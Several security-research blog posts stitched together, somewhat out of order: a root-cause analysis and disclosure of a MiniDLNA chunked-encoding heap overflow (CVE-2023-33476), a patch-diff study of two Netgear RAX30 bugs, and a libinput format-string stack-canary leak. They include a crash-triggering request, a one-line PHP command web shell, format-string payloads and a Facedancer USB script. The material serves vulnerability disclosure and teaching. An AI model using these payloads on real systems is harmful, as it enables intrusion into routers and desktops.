And there we are! Hopefully this has all been useful for understanding everything that goes into writing a full exploit for this kind of vulnerability. Ultimately, it isn’t complete in the sense that it assumes an info leak is already present to leak Libc and GOT addresses. This same bug could potentially be used to get that info leak but I didn’t invest much time in figuring that out. Maybe that can be left as an exercise for the curious reader.

exploitability in the Real World(TM)

Exploitability of this bug will be dependent upon the Libc version the application is linked against and compiler exploit mitigations used, to some extent. Given the variability of these factors across the range of devices this application is deployed to (IoT, routers, linux servers), there is a high likelihood of finding Libc versions vulnerable to multiple heap exploit techniques and missing exploit mitigations such as ASLR, RELRO, etc. Ultimately, because the bug provides for a strong write primitive, there are various options for exploitation. While most modern Linux distros running on desktop/server hardware now enable common compiler exploit mitigations for default applications and applications installed through the package manager, MiniDLNA is frequently deployed on IoT devices where those mitigations are likely to not be enabled; versions built from source by end-users are also unlikely to enable these mitigations. The exploit strategy and mechanisms used in the included exploits will not work universally across all platforms and configurations, but there are likely dozens of targets that would meet the necessary criteria.

arm32 exploit?

This post is already pretty long and it’s taken me longer than expected to release it, so I’ve decided the split the last section going over the exploit I wrote for the arm32 minidlnad binary from the Netgear RAX30 into a separate post, though the exploit code for both will be made available now. That exploit works a little differently, targeting the stack rather than the GOT for overwrite since that binary has full RELRO enabled (which makes the GOT read-only).

Resources

• Exploit Code Repo
• Mozilla - HTTP Transfer Encoding
• Azaria Labs - Understanding the Glibc Heap Implementation
• Understanding Glibc Malloc
• how2heap -Tcache Poisoning

Update: The second part of this post has been published and can be found here

Introduction

Update 2023-06-02: The vulnerability has been assigned CVE-2023-33476.

This post will go over the details and root cause of a heap buffer overflow vulnerability I discovered in the HTTP chunk parsing code of MiniDLNA, affecting up to version 1.3.2. This vulnerability can be exploited to achieve remote code execution in the context of the user that the minidlna server is running as.

The second part of this post contains a detailed write-up of the exploit development process along with two fully weaponized exploits for both x86_64 and ARM32 targets and can be found here.

Vulnerability Summary

MiniDLNA is a simple media server software, with the aim of being fully compliant with DLNA/UPnP-AV clients. It is commonly deployed on Linux servers and across a wide range of embedded devices like routers and NAS devices.

The latest version of the MiniDLNA/ReadyMedia media server contains a vulnerability in the HTTP request processing code responsible for handling requests that use chunked encoding which can result in an out-of-bounds read/write leading to remote code execution. The issue occurs in the validation logic for chunk sizes in ParseHttpHeaders() and results in the return value of a comparison expression being incorrectly saved to a variable used to track the parsed chunk size rather than the return value of strtol() that’s used to parse the size. This allows for values larger than the total request size to pass validation; the application later parses and passes these chunk size values as the size argument in call(s) to memmove(), resuling in an OOB read/write on the heap.

Affected Versions

• All versions between 1.1.5 and 1.3.2 (inclusive)
• Default versions provided by apt on Debian 11 and Ubuntu 22.04
• Version deployed on the Netgear Nighthawk RAX30 w/ latest patches

Minimal Testcase to Trigger the Bug

This testcase will trigger the bug by passing a huge value (0xffffff) that is much larger than the total request length sent, resulting in an OOB read past the end of the request buffer allocation and into unmapped memory. The application should crash with a segmentation fault.

GET /status HTTP/1.0\r\nTransfer-Encoding:chunked\r\n\r\nffffff\r\n0\r\n\r\n

Discovery

I originally discovered this vulnerability while fuzzing an older version of the software while hunting for bugs on the Netgear RAX45. I wasn’t familiar enough with the code base to know exactly the right place to fuzz so I just chose to go for the most reachable part of the code: HTTP request handling. Fuzzing was done using both LibFuzzer and AFL++ using custom harnesses. I made some minor changes to the code to improve fuzzability, including removal of the network read/write functionality, but otherwise no other changes were needed.

The core portion of the harness used to find this particular bug is shown below. The full harness code and other helper code will be released soon.

#include <stdio.h>
#include <stdint.h>
#include <stddef.h>
#include "minixml.h"
#include "upnphttp.h"
#include "upnpsoap.h"
#include "containers.h"
#include "upnpreplyparse.h"
#include "scanner.h"
#include "log.h"

void ProcessHttpQuery_upnphttp(struct upnphttp *);

int LLVMFuzzerTestOneInput(char *buf, size_t size)
{
    struct upnphttp *h = New_upnphttp(1);
    const char *endheaders;
    h->req_buf = (char *)malloc(size+1);
    if (!h->req_buf)
    {
      return 0;
    }
    memcpy(h->req_buf, buf, size);
    h->req_buflen = size;
    h->req_buf[h->req_buflen] = '\0';
    /* search for the string "\r\n\r\n" */
    endheaders = strstr(h->req_buf, "\r\n\r\n");
    if(endheaders)
    {
      h->req_contentoff = endheaders - h->req_buf + 4;
      h->req_contentlen = h->req_buflen - h->req_contentoff;
      ProcessHttpQuery_upnphttp(h);
      free(h->req_buf);
      free(h->res_buf);
      free(h);
      return 0;
    }
    free(h->req_buf);
    free(h->res_buf);
    free(h);
    return -1;
}

After a few days of fuzzing, tweaking the harnesses, and fuzzing some more, I had come across a handful of crashes that seemed somewhat promising. Among them was this one.

An interesting side note here: thanks to Netgear’s terrible practices with their GPL code releases, it turned out that the actual device I was testing against (RAX45) was not only running a newer version than the one they included in their GPL package, it was also a custom fork that apparently had fixed these bugs already. I confirmed this by reversing the binary taken straight from the device. Maybe its just me, but its nuts that they’re fixing vulnerabilities in their internal forks of open source code and not providing those fixes in their GPL packages, let alone pushing them upstream. After discovering this I decided to pivot to just focusing on the latest code from MiniDLNA Git repo and confirmed that version was vulnerable as well.

Root Cause Analysis

The vulnerable code is reached for any valid request that includes the Transfer-Encoding:chunked HTTP header and that meets the following conditions:

• Correctly terminates the HTTP headers with \r\n\r\n sequence
• Includes a terminator chunk at the end of the request body with a chunk size of 0
• Correctly follows chunk size values with terminator sequence \r\n

The function call chain is shown below, beginning in Process_upnphttp() (upnphttp.c:1096):

Process_upnphttp() →
    ProcessHttpQuery_upnphttp(h) →
        ParseHttpHeaders(h) ← (returns)
    ProcessHttpQuery_upnphttp(h) -- VULNERABLE CODE

Initial Request Handling: Process_upnphttp()

The code responsible for the initial reception and processing of requests is in Process_upnphttp() and is described below.

Process_upnphttp(), upnphttp.c:1096

Data is read from the socket using recv(), up to 2048 bytes at a time, into a static 2048-byte char buffer. If data is received, the code calculates new_req_buflen as req_buflen + bytes_recv'd and checks whether the new buffer length would exceed a max value of 1MB. If so, an error is return; otherwise the code continues.

    struct upnphttp *h = ev->data;
    char buf[2048];
    [...]
    {
        int new_req_buflen;
        const char * endheaders;

        // new buf_len is the sum of the last calculated red_buflen and the
        // number of bytes the call to `recv` returned
        new_req_buflen = n + h->req_buflen + 1;

        // check to see if the new buf len exceeds a max value (1MB)
        if (new_req_buflen >= 1024 * 1024)
        {
            DPRINTF(E_ERROR, L_HTTP, "Receive headers too large (received %d bytes)\n", new_req_buflen);
            h->state = 100;
            break;
        }
    }

Further down in this function, realloc() is called using the calculated new_req_buflen as the size and passing the pointerh->req_buf as the buffer to perform the reallocation on. On the first round of processing (i.e. the first 2048 bytes received) h->req_buf will be NULL and realloc() behaves like a normal call to malloc(). The data is copied from the static buffer into the buffer pointed to by h->req_buf and the h->req_buflen field of the upnphttp struct is updated with the new size.

                h->req_buf = (char *)realloc(h->req_buf, new_req_buflen);
                if (!h->req_buf)
                {
                    DPRINTF(E_ERROR, L_HTTP, "Receive headers: %s\n", strerror(errno));
                    h->state = 100;
                    break;
                }

                // copy n bytes from the local `buf[2048]` to the alloc'ed memory
                // req_buflen will be 0 on the first round of processing since it's not updated
                // until the next line.
                memcpy(h->req_buf + h->req_buflen, buf, n);
                // update req_buflen
                h->req_buflen += n;

Next, the buffer is null terminated and then passed to strstr() to search for an \r\n\r\n sequence to determine whether the full HTTP headers section of the request has been received. Upon finding this sequence, the start of the request body and it’s size are also calculated and the respective values in the upnphttp struct (req_contentoff and req_contentlen) are updated. The code then calls ProcessHttpQuery_upnphttp() to move onto parsing.

            h->req_buf[h->req_buflen] = '\0';

            // search for the string "\r\n\r\n" and calculate content offset and content length if
            // found
            endheaders = strstr(h->req_buf, "\r\n\r\n");

            if(endheaders)
            {
                h->req_contentoff = endheaders - h->req_buf + 4;
                h->req_contentlen = h->req_buflen - h->req_contentoff;
                ProcessHttpQuery_upnphttp(h);

NOTE: The headers have only been read into h->req_buf at this point without parsing; they will be parsed into fields of the upnphttp struct within the call to ProcessHttpQuery_upnphttp() at the end of this code block.

ProcessHttpQuery_upnphttp():

The first call to this function only happens once the \r\n\r\n sequence is found, indicating the end of the HTTP header section was received. After parsing the HTTP verb and path, it calls ParseHttpHeaders() to perform the actual parsing of the header data before doing anything else; the source of the vulnerability is found here.

When ParseHttpHeaders() returns and indicates the full request was recieved by setting h->req_chunklen to 0, processing of the chunks in the HTTP body will resume in ProcessHttpQuery_upnphttp(); this is where the corruption caused by the bug is triggered when h->req_chunklen is passed to memmove() without validating that it does not exceed the allocated buffer.

BUG: Incorrect Chunk Size Validation in ParseHttpHeaders()

After reading data from the socket and finding the end of the HTTP header section as indicated by the presence of the \r\n\r\n sequence, Process_upnphttp() passes the request off to ParseHttpQuery_upnphttp(), which in turn calls ParseHttpHeaders() to perform the actual parsing of the header data into a upnphttp struct. If the HTTP headers contain the Transfer-Encoding:chunked header, a flag is set on the structure which will result in the application reaching the vulnerable code on line 428.

After some rudimentary sanity checks of the h->req_chunklen and h->req_contentoff fields of the struct, the code iterates through the rest of the request body, attempting to read the numeric size values for each of the chunks at the expected offsets based on sizes read. It combines the step of reading the size value and attempting to perform the size validation inside the conditions of the following while loop:

    while( (line < (h->req_buf + h->req_buflen)) &&
           (h->req_chunklen = strtol(line, &endptr, 16) > 0) &&
           (endptr != line) )

The following checks are performed:

• Checks if the char ptr line has been incremented past the end of the allocation in h->req_buf. line is incremented by the parsed req_chunklen at the end of the inner block of the while loop.
• Attempt to parse a size value using strtol() and ensure the value is greater than 0;
• Ensure the char pointer endptr is not pointing to the same location as line after the call to strtol() which indicates no parsable digit was found.

The bug occurs in the evaluation of the second condition, where strtol() is called; the intent is for the return value of strtol() to be saved to h->req_chunklen and to compare the saved value to 0 for the validation step. Instead, the result of the comparison expression strtol(x,x) > 0 is saved to h->req_chunklen, resulting in the incorrect calculation of the total expected request size as the Boolean result of the expression would evaluate to 1 for all numbers greater than 0.

Within the inner block of the while loop, the value saved to h->req_chunklen is used to increment the line pointer to the location where the next chunk size is expected, indicating the true intent of the code (comments added for annotation).

    {
        endptr = strstr(endptr, "\r\n");
        if (!endptr)
        {
            return;
        }

        // if strtol() returned a size greater than 0, `line` will only ever be incremented
        // by 1 (the bool eval of the comparison in int) at most, which means the first validation
        // condition in the while loop will not properly detect large values that exceed the size
        // of the request buffer allocation
        line = endptr+h->req_chunklen+2;
    }

This means that even for very large chunk sizes, the line pointer will only ever be incremented by 1 at most for each iteration through the loop, meaning the validation check in the first condition of the while loop will not be triggered and catch these sizes that exceed the length of data sent in the request body.

OOB read/write on chunk sizes > request length in ProcessHttpQuery_upnphttp()

After the headers have been parsed in ParseHttpHeaders(), execution returns to ProcessHttpQuery_upnphttp(), where the value saved to h->req_chunklen is checked; if it is 0 after the request header parsing, it is assumed that the full request has been received and that the request buffer at h->req_buf is large enough to fit all the expected data based on chunk sizes.

Parsing of the actual chunks from the request body then continues in the code block below (upnphttp.c:893) after returning from ParseHttpHeaders():

    char *chunkstart, *chunk, *endptr, *endbuf;
    // chunk, endbuf, and chunkstart all begin pointing to the start of the http request body
    chunk = endbuf = chunkstart = h->req_buf + h->req_contentoff;

    while ((h->req_chunklen = strtol(chunk, &endptr, 16)) > 0 && (endptr != chunk) )
    {
        endptr = strstr(endptr, "\r\n");
        if (!endptr)
        {
            Send400(h);
            return;
        }
        endptr += 2;

        // this call to memmove will use the chunklen parsed by strol() above
        // without checking that it doesn't read beyond the end of the request buf.
        memmove(endbuf, endptr, h->req_chunklen);

        endbuf += h->req_chunklen;
        chunk = endptr + h->req_chunklen;
    }
    h->req_contentlen = endbuf - chunkstart;
    h->req_buflen = endbuf - h->req_buf;
    h->state = 100;

Summary of while loop conditions/checks:

• Condition 1:
  • Attempt to parse a chunk size number as a long using strtol(), passing in the chunk pointer which begins the while loop pointing to the start of the request body section (immediately following the headers). The number will be parsed as base 16, meaning hex digits A-F are considered valid.
  • The return value of the call to strtol() is saved to h->req_chunklen and a comparison is performed to check whether it is greater than 0; this must evaluate true for the parsing to continue
• Condition 2:
  • Check that the value that strtol() saved to endptr does not point to the same place as chunk, which would indicate that no valid numeric value could be parsed from the string.

The code in this block relies on the validation performed during the header parsing step and so it parses and uses the user-controlled chunk size as the size argument in calls to memmove() without bounds checking. This results in the application accepting chunk size values that exceed the number of bytes received in the request, leading to an OOB read/write.

The while loop used to iterate through the chunks in this block is nearly identical to the one in ParseHttpHeaders(), except this one includes an additional set of parentheses around the assignment and comparison expressions in the call to strtol(), resulting in the correct assignment of the return value to h->req_chunklen. Had the same bug present in the ParseHttpHeaders() chunk size parsing code been introduced here, it would have probably been noticed much sooner as chunks would likely get truncated as a result of the incorrect logic.

Conclusion

Suggested Fix

The issue can be fixed by wrapping the assignment expression in the second condition of the while loop in ParseHttpHeaders() (upnphttp.c:150) used to validate chunk sizes in parentheses to correctly separate the assignment from the comparison expression that compares the value to 0.

The fixed code would be:

    while ((line < (h->req_buf + h->req_buflen)) &&
           ((h->req_chunklen = strtol(line, &endptr, 16)) > 0) && // FIX HERE
           (endptr != line) )

A patch with this fix was provided to the package maintainer along with the vulnerability report.

Disclosure Timeline

• 2023-04-18: Submitted vulnerability report to Zero Day Initiative RE: vulnerable Netgear RAX30
• 2023-05-04: ZDI rejects the vulnerability report (not interested in the product)
• 2023-05-05: Request a CVE ID from Mitre
• 2023-05-05: Unable to find a private avenue to report to the package maintainer directly, so instead submit reports to Debian and Ubuntu security teams since they have vuln versions in their repos
• 2023-05-08: Debian security team shares the email address of the package maintainer; reach out to them over email and submit a private bug report on the Sourceforge page.
• 2023-05-08: Package maintainer acknowledges report and begins working on fix
• 2023-05-31: Package maintainer releases fixed version, 1.3.3
• 2023-05-31: Follow up message to Mitre, CVE assignment pending
• 2023-06-02: Mitre assigns the vulnerability CVE-2023-33476

Exploitation

As this is a heap-based vulnerability, exploitability of this issue will be dependent upon the Glibc version the application is linked against and compiler exploit mitigations, to some extent. Ultimately, because the bug provides for a strong read/write primitive, there are various options for exploitation.

Part 2 of this series going over the exploit development process and the exploits I wrote for this bug can be found here.

Reference/Links

• Exploits
• MiniDLNA Project Home
• Bug fix commit
• Original Git issue where bug was reported
• Mitre: CVE-2023-33476
• NIST National Vulnerability Database: CVE-2023-33476

Overview

Target bugs:

• ZDI-23-499: soap_serverd buffer overflow
• ZDI-23-496: lighttpd misconfiguration -> RCE

Target firmware versions:

• Prepatch: 1.0.9
• Patched: 1.0.10

Analysis

ZDI-23-499: soap_serverd stack-based buffer overflow

The description of this bug says the flaw occurs because “when parsing SOAP message headers, the process does not properly validate user supplied data before copying it to a fixed-length stack buffer.” Based on my previous experience with Netgear and specifically their SOAP server implementations, I had a pretty good idea where to look. In fact, I even a hunch that this was the same/similar to a bug I’d found on another Netgear device last year, and so before spending much time going through the diff’ed binaries, I did a quick search for references to sscanf in the patched and nonpatched versions and pretty easily identified where the bug occured. Interestingly, this bug is very similar but also unique to the issue I’d previously found – leave it to Netgear to ship two unique vulnerabilities using the same vulnerable C functions and in code that processes the same data lol.

The bug is caused by use of sscanf() without supplying length-limit values in the format string. The vulnerable version of the code attempts to parse out the HTTP method, path, and HTTP version string from the header using the following code:

    iVar1 = __isoc99_sscanf(local_3024,"%[^ ] %[^ ] %[^ ]",&v1, &v2, &v3);
    if (iVar1 == 3) {
      iVar7 = strcasecmp((char *)&v1, "post");

This is the patched version of the same code, showing the addition of length limit specs in the format string:

    iVar1 = __isoc99_sscanf(&local_1824,"%511[^ ] %511[^ ] %511[^ ]",&v1, &v2, &v3);
    if (iVar1 == 3) {
      iVar7 = strcasecmp((char *)&v1,"post");

On the surface this looks like a pretty straightforward stack-based buffer overflow, and there seem to be some variables within the function that may be interesting targets for overwrite. An interesting note is that the advisory does not indicate this bug results in code execution but instead specifically mentions that it can be used to bypass authentication. This may be due to the fact that the binary is built with stack canaries, which makes exploitation more difficult. This is the same reason why I’d been unable to exploit the variant of this bug I mentioned earlier.

NOTE: The folks who discovered and exploited this bug at Pwn2Own posted their write-up of this bug before I had finished this post so I’ve been able to confirm the above assumption was correct: the stack canaries resulted in the bug not being directly exploitable for code exec. Check out their write-up here to see how they chained this bug with a few others to get RCE.

ZDI-23-496: lighttpd Misconfiguration RCE

The information provided about this bug indicates it isn’t a memory corruption issue but a misconfiguration that results in arbitrary code execution. Specifically it says:

The specific flaw exists within the configuration of the lighttpd HTTP server. The issue results from allowing execution of files from untrusted sources. An attacker can leverage this vulnerability to execute code in the context of root.

Based on this description, I focused on comparing the lighttpd configuration files in etc/lighttpd between the two versions.

Comparing Config Changes

etc/lighttpd/conf.d/lighttpd4.conf

The patches version of this file includes the follow additions:

• Addition of alias.url = ("/shares" => "/var/samba/share/" at the global level
• Inside the HTTP["url"] = "^/shares" definition for “usb storage” in the IPv4 section
  • server.follow-symlink = "disable"
  • static-file.exclude-extensions = ()
  • fastcgi.server = ()

etc/lighttpd/conf.d/usb_lighttpd.conf

• Addition of alias.url = ("/shares" => "/var/samba/share/" at the global level

etc/lighttpd/conf.d/usb_allow.inc

• Inside the HTTP["url"] = "^/shares" definition for “usb storage” in the IPv4 section
  • server.follow-symlink = "disable"
  • static-file.exclude-extensions = ()
  • fastcgi.server = ()

etc/lighttpd/conf.d/usb_allow_auth.inc

• Inside the HTTP["url"] = "^/shares" definition for “usb storage” in the IPv4 section
  • server.follow-symlink = "disable"
  • static-file.exclude-extensions = ()
  • fastcgi.server = ()

Conclusions Based on Changes

The issue seems to be focused around the /shares path, which is mapped to the samba share directory where mounted USB drives can be accessed on the network like a NAS. The addition of server.follow-symlink = "disabled" suggests the issue may result in the ability to access files on the host filesystem using symlinks on the mounted drive.

Its possible that the addition of fastcgi.server = () was needed to avoid having the global settings for this handlers apply. The top level fastcgi.server assignment in conf.d/lighttpd4.conf shows the following:

fastcgi.server += (
	".php" => ((
		"socket" => "/var/run/php-fpm.sock",
		#"bin-path" => "/bin/php-fpm -n -R -y /etc/php-fpm.conf",
		#"max-procs" => 1,
		"broken-scriptfilename" => "enable"
	))
)

This lead me to believe the exclusion of the explicit fastcgi.server = () in the pre-patched version resulted in the global setting being applied, which would allow PHP files to be executed.

Exploits: ZDI-23-496 Lighttpd Misconfiguration

Based on the conclusions drawn from the changes made, the most likely entry point was going to be files mounted via USB drive so I created a ext2-formatted drive to use for testing (ext2 since it was going to be necessary to create symlinks) and downgraded to the vulnerable firmware version.

Local File Inclusion via Symlink

My assumption was that the addition of the symlink config options in the latest patches meant that the vulnerable version would follow symlinks resulting in the ability to reference (and access) files outside of the USB filesystem. To test this, I created a symlink on the USB drive pointing to /var/passwd as this is where the actual passwd file is stored on the device at runtime. If the assumption is correct, accessing this file from the router should return the actual password file from the device.

After connecting the USB drive to the router, the files become visible at http://<routerip>/shares/. Accessing the symlink that was created pointing to /var/passwd results in the actual password file on the device (found at that path) being returned and downloaded locally.

RCE via PHP Files

To test the assumption regarding PHP files mounted via USB being executable, I used the same USB stick, this time simply creating a PHP file to execute phpinfo(); as a simple way to confirm execution. This worked as expected and the PHP info output was shown on the page. I then created a simple PHP page that would allow me to pass shell commands in a URL parameter for easy shell access.

PHP shell command proxy:

<?php echo system($_GET['cmd']); ?>

Finally, I used this to have the device download a shell script over HTTP from my machine to open a reverse shell:

Conclusion

This turned out to be a fun exercise and it turned out some of my prior experience with Netgear devices proved to be useful.

The soap_serverd issue was exploited during the latest Pwn2Own as part of a longer exploit chain that eventually resulted in RCE, though direct exploitation seems infeasible due to the presence of stack canaries.

For the lighttpd issue, exploitation requires physical access to the device, at least long enough to plug in the USB drive and send the necessary requests. This isn’t infeasible, though considering these routers are primarily used in SOHO settings this may not be quite as critical as a fully remote RCE.

References/Links

• Netgear RAX30 firmware
• ZDI-23-499 - soap_serverd buffer overflow
• ZDI-23-496 - Lighttpd misconfiguration

Discovery

This is an issue that I had independently discovered in Xorg (or so I thought) a while back while messing around with the GreatFET One, a cool little device for USB hacking. While trying out some random payloads I found that connecting a USB keyboard device with format strings in certain device descriptor fields caused Xorg to crash. Specifically, it was the manufacturer, serial, product string fields. Unfortunately, I quickly ran into issues while trying to setup a testing environment as I would immediately crash my own X session as soon as I connected the device, even when trying to pass it through to a VM directly. I decided to just save it for another day when I had time to figure out a good solution to those issues, but it ended up sitting for months and I never did much to go back to it.

Then, a couple of weeks ago I saw some CVEs get released for something in Xorg that seemed tangentially related to input devices, which piqued my attention. It got me wondering whether it was the same bug I had found, so I dug up my notes and decided to take a closer look. While doing this I figured out that the issue was actually not in Xorg itself (at least not completely), but actually in libinput. Once I’d figured this out, I went looking for the libinput source code to find the code for the functions I was seeing in the backtrace and ended up finding the specific commit where the issue was fixed in April of this year. Well, shit lmao.

Root Cause Analysis

The reporter of the issue provided a detailed description of the vulnerability in the report. Here’s a snippet that’s a good tl;dr:

- Newly connected evdev devices are logged using evdev_log_msg.
- The format parameter is manipulated at src/evdev.h:785 to prepend (among other things) the device name.
- The resulting string buf is then passed as the format parameter to log_msg_va at src/evdev.h:796
- In X.org (and probably other users of libinput), this logging function eventually leads into the system's sprintf.
- If the device name contains printf-style formatting placeholders such as %s or %d, these will be passed on to the new format string, and interpreted incorrectly. User-controlled format strings are a known security vulnerability, CWE-134, and can be used by an attacker to execute malicious code.

Basically, the issue came down to the fact that user-controlled input was prepended to a predefined format string before being used as the format argument in a call to sprintf().

While doing some more digging on specific components of libinput I came across the blog post where the reporter(s) talked about the accidentally stumbling across the issue and their root causing process (no surprise, its actually a security company lol). Check out that post for a great analysis and description of exactly where the issue happens.

So, the root cause analysis was already done…but no poc exploit code was provided. There was an intersting discussion around the likelihood/plausability of exploitation in the git issue between the reporter(s) and developers where they discussed potential avenues for exploitation and the true impact/risk (check it out for details). tl;dr the determination was that at best the bug provides an attacker with an info leak and nothing else but at worst could potentially lead to code execution.

With that in mind, I thought it still might be worth doing the work of exploring both the info leak and the potential for RCE and produce exploits for both (hopefully).

Exploit: Leaking the Stack Canary

I started off with the info leak exploit. One of the most useful things an info leak can provide is the ability to leak the stack canary so I decided that would be the goal of the exploit. Because the canary value is stored on the stack and format string arguments are read from the stack, its usually possible to do this pretty easily.

Testing environment:

• Debian 11 host
• Xubuntu 20.04 VM in Virtualbox
• USB host device passthrough to the VM
• Set up SSH on VM

First things first, though: in order for a format string to be useful for this kind of info leak, there needs to be a way to get output back from the program that shows the values read from the stack. Thankfully, in this case,the output is written to the Xorg log file, which is world-readable. With the confirmed, the next step was figuring out exactly where the stack canary was so we can find it reliably.

Constraints: Field Length Limit

In this case, there were some constraints that made things only slightly harder. The length of each field must be less than 126 characters - this is because the USB device structure that holds the fields is 255 bytes, the first 4 of which are reserved to hold the length of the field. The string values are interpreted as UTF-16 as per the USB specification, so the remaining 254 bytes are split in half.

Constraint: Additional %s format strings

The first issue I ran into almost right away when I started testing payloads was that nearly every payload I tried immediately resulted in a SIGSEGV. It wasn’t immediately obvious why this was happening as it’s usually possible to use specifiers like %x to read values without causing a crash (i.e. doesn’t usually lead to OOB read).

Specifically, one of the calls to *sprintf_internal was prepending the format strings I was submitting to another string that contained another 11 %s specifiers, as show in the GDB output below

Thread 1 "Xorg" hit Breakpoint 1, __vsnprintf_internal (string=0x7ffce6903d65 "", maxlen=0x3fb, format=0x7ffce69041c0 "event7  - CCCC <CONTROLLED INPUT>: is tagged by udev as:%s%s%s%s%s%s%s%s%s%s%s\n", args=0x7ffce69041a8, mode_flags=0x2) at vsnprintf.c:95

This is a problem because each format specifier placed in the controllable strings will consume an argument from the stack and %s format specifiers indicate the argument value will be treated as a char pointer and dereferenced as such; once the arguments for each format spec in the submitted payload were consumed, it became virtually impossible to avoid triggering a segmentation fault caused by a read to an invalid address when the %s specs were reached.

After doing a bit of reading through the man pages for sprintf and some Google searches, I figured out I could use direct parameter access on the format specs in my payload to keep the va_arg pointer fixed. Using parameter access in the format specs does not move the main argument pointer, so in a format string such as %1$x %2$x %x , the first format reads from parameter 1 and the second from parameter 2, but the third reads from parameter 1 again because it’s the first format spec to appear without a parameter specified. The example below shows this in action:

xorg@xuxorg:~$ echo -n "%1\$s%2\$s%3\$s%4\$s" | ./toy
[+] fmt string: '%1$s%2$s%3$s%4$s | %s%s%s%s\n'
[+] args: '1111.', '4444.', '5555.', '6666.'

[+] result:
1111.4444.5555.6666. | 1111.4444.5555.6666.

This is how I was able to get around the issues with the extra %s specs, but it cut down the total number of format specificiers I could place in a single field. There were a total of 126 characters that could be used and each normal format spec (without a parameter index) takes up 2 characters, resulting in a total of 63 format specs that could be inserted. The addition of the parameter access syntax adds a minimum of 2 characters per format spec. Assuming only single-digit indices are used (4 characters total), this cuts down the actual max number of specs that could be included in each field to 31. This means for each run of the ‘exploit’ we’ll only be able to read a total of 31 values off of the stack.

Those already familiar with format string bugs would be correct to assume that, ultimately, this length limit isn’t necessarily an issues since it doesn’t limit how far into the stack we’re able to read. This is because the set of parameter indices can be updated between runs (e.g. run1 uses indices 1-20, run2 uses indices 20-40, etc) to continue reading further into memory. Unfortunately, this is one of the cases where the length limit is very much an issue, as I quickly discovered when I tried to do that.

Constraints: FORTIFY_SOURCE=2

While doing some testing and trying to dump out values I noticed that any time I used parameter access format specs that didn’t include all indices below the max index used (i.e. if a format string accessed parameter 5 without accessing 1-4) the application would crash with a SIG_ABORT. When investigating this with GDB attached, I noticed this string in the exception handler that throws the ABORT signal: "*** invalid %N$ use detected ***\n". A quick Google search later led me to figuring out that the Xorg binary I was testing against was compiled with the FORTIFY_SOURCE=2 flag.

a quick detour: tl;dr on FORTIFY_SOURCE=2

I wasn’t familiar with the specific mitigations/checks provided by this flag before this so I spent a bit of time digging into it. I’ll probably spend more time talking about this in a future post so for now here’s the tl;dr version with the most important points:

• Compiler-provided security checks and exploit mitigation mechanisms (just like -fstack-protector)
• This includes both compile-time and run-time checks
• =2 specifically enables format string exploit mitigations; requires optimization level ≥ 2
  • %n is not allowed in format strings stored in writeable memory (i.e. don’t allow from user-writeable memory regions)
  • Direct parameter access cannot ‘skip’ values; if the 5th parameter is accessed directly, parameters 1-4 must also be accessed somewhere in the format string

That last point is the pertinent one in regard to the issue mentioned at the end of the previous section. This meant that the length limit would effectively create a maximum parameter index that could be accessed while remaining within the boundaries of the constraints and avoiding a crash.

We can calculate the max index like so:

• Accessing single-digit indices consume 4 characters per spec: %N$x
  • Accessing arguments 1-9 consumes 36 characters total (9 * 4)
• Accessing double digit indices (10 to 99) consume 5 characters per spec: %NN$x
  • With 90 characters remaining (126 - 36), a maximum of 18 more arguments can be accessed (90 / 5)
• Maximum index is 9 + 18 = 27

Exploit: Leaking the Canary

Given the constraints described above, the exploit ultimately comes down to a bit of luck — as long as the canary is close enough on the stack to be reachable with the available parameter indices for the vulnerable stack frame, it should be leaked in the log file.

I began with this payload, which only reads up to the 22nd arg so that the .’s between the specs can be included to split things up and make the outputs easy to distinguish.

"%1$p.%2$p.%3$p.%4$p.%5$p.%6$p.%7$p.%8$p.%9$p.%10$p.%11$p.%12$p.%13$p.%14$p.%15$p.%16$p.%17$p.%18$p.%19$p.%20$p.%21$p.%22$p"

Unfortunately, that didn’t work and none of the values in the output matched the pattern of a canary. So, it would come down to the last 5 args. I removed the dots from the first 22 formats to get those characters back and read up the 25th.

"%1$p%2$p%3$p%4$p%5$p%6$p%7$p%8$p%9$p%10$p%11$p%12$p%13$p%14$p%15$p%16$p%17$p%18$p%19$p%20$p%21$p%22$p.%23$p.%24$p.%25$p"

Luck was on my side. I checked the logs and found what looked a lot like a canary value. As can be seen, the value’s location on the stack changes slightly between different vulnerable function calls. Stack canaries on most Linux distros are 64-bit numbers that end with a null byte. They’re usually not too difficult to find since they don’t look like valid addresses or hex ASCII values(except when they do).

Facedancer Script

Facedancer is the name of another USB hacking board similar to the GreatFET and a Python module that provides USB emulation capabilities for compatible boards. This is incredibly useful for quick prototyping and testing, especially being able to programmatically define how the device will behave in response to different requests sent by the host.

This Facedancer script will trigger the bug and place markers around the locations that are likely to contain the canary value to make it easier to find.

#!/usr/bin/env python3
# pylint: disable=unused-wildcard-import, wildcard-import
import sys
import os
import logging
from facedancer             import devices, main
from facedancer.devices.keyboard import USBKeyboardDevice

prefix = "%1$c%2$c%3$c%4$c%5$c%6$c%7$c%8$c%9$c%10$c%11$c%12$c%13$c%14$c%15$c%16$c%17$c%18$c%19$c%20$c%21$c%22$c"
canary_maybes = "X:%23$p_X:%24$p_X:%25$p" # grep for `X:0x.{14}00`
payload = prefix + canary_maybes

print("[+] reading args from $FSERIAL, $FPRODUCT, and $FMANU env vars")
serial = os.environ.get("FSERIAL", "C"*100)
product = os.environ.get("FPRODUCT", "HYPRODUCT")
manu = os.environ.get("FMANU", payload)

# create the device and connect
DEVICE = USBKeyboardDevice()
DEVICE.serial_number_string = serial
DEVICE.manufacturer_string = manu
DEVICE.product_string = product
DEVICE.product_id = 0x1337
DEVICE.vendor_id = 0x1337
main(DEVICE)

The values can then be searched for in the Xorg log file using grep:

# find it in the logs
grep -a -E "X:0x.{14}00" /var/log/Xorg.0.log

The screenshot below the canary value in the running Xorg process while attached with GDB and the same value shown in the Xorg log:

This has only been confirmed to work on default installations of Xubuntu 20.04.4 (i.e. before installing any updates, as patches have been pushed). I did test on a Debian 11 system but wasn’t able to get the canary value to leak within the same constraints. Apparently, most distros now enable essentially all exploit mitigations (canaries, RELRO, FORTIFY_SOURCE, etc) on default packages. So, YMMV on different distros or even Ubuntu versions.

Code Exec?

